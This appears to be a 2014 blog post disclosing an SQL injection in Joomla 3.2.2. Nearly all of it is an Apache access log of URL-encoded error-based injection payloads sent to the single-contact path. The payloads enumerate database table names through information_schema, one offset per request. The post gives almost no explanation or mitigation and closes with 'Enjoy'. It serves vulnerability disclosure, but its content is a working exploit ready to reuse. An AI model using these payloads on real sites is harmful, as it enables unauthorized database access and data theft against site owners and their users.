Saturday 3 May 2014

How I meet your Joomla 3.2.2 SQL Injection

In March this year I found that Joomla 3.2.2 with default data
installed is vulnerable to SQL Injection attack.
 

After few lines from log from April,
you should know how it was done.

root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; 

rv:29.0) Gecko/20100101 Firefox/29.0"


Joomla 3.2.2 error


Why I decide to publish it. And here you will find even more.


Enjoy
o/